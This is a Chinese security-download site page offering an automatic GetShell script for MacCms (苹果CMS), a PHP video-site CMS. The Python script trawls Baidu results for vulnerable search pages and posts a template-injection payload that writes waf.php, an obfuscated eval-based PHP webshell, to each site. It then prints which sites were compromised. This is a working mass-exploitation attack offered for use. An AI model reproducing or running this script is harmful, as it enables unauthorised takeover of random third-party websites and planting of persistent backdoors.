ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全工具 → MacCms(苹果CMS)全自动GetShell脚本
MacCms(苹果CMS)全自动GetShell脚本

MacCms(苹果CMS)全自动GetShell脚本

评分:0.0
下载地址
  • 软件介绍
  • 软件截图
  • 同类推荐
  • 相关文章

软件Tags: [db:tag]

MacCms(苹果CMS)全自动GetShell脚本

CMS简介

苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序、视频程序这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。

大多数的影视站点都用的这款CMS。

GetShell脚本

 

 
  1. # coding=utf-8
  2.  
  3. import requests
  4.  
  5. import urllib
  6.  
  7. from bs4 import BeautifulSoup
  8.  
  9. headers = {
  10.  
  11. "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
  12.  
  13. }
  14.  
  15. def xxe():
  16.  
  17. exp = '&wd={{page:lang}if-:fputs(fopen(base64_decode(d2FmLnBocA),w),base64_decode(PD9waHAgJGFycj0iantmcS0pZFVUWFlgfWIuQCI7IGZvcigkaT0wOyRpPCBzdHJsZW4oJGFycik7JGkrKyl7JGFyclskaV09Y2hyKG9yZCgkYXJyWyRpXSktNSk7fWV2YWwoJGFycik7Pz4))}22{endif-}&submit='
  18.  
  19. keyurl = 'http://www.baidu.com/s?wd=inurl:index.php?m=vod-search' + '&pn='
  20.  
  21. x = 0
  22.  
  23. while True:
  24.  
  25. url = keyurl + str(x * 10)
  26.  
  27. x+=1
  28.  
  29. xxx = requests.get(url=url,headers=headers).text
  30.  
  31. req = BeautifulSoup(xxx,'html.parser')
  32.  
  33. html = req.select('div.c-container > h3 > a')
  34.  
  35. #sqls = requests.get(a['href']).status_code
  36.  
  37. #sql = requests.get(a['href']).url
  38.  
  39. # xxe()
  40.  
  41. sql = html[0].attrs['href']
  42.  
  43. sqlss = requests.get(sql).url
  44.  
  45. shell = urllib.urlopen(url=sqlss,data=exp).read()
  46.  
  47. if '您的提交带有不合法参数' in shell:
  48.  
  49. print '没有漏洞'
  50.  
  51. else:
  52.  
  53. print shell + '\n\t此网站存在漏洞,一句话地址waf.php'
  54.  
  55.  
  56.  
  57. xxe()

 

展开内容

软件截图

下载地址

  • PC版

推荐文章

用户评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网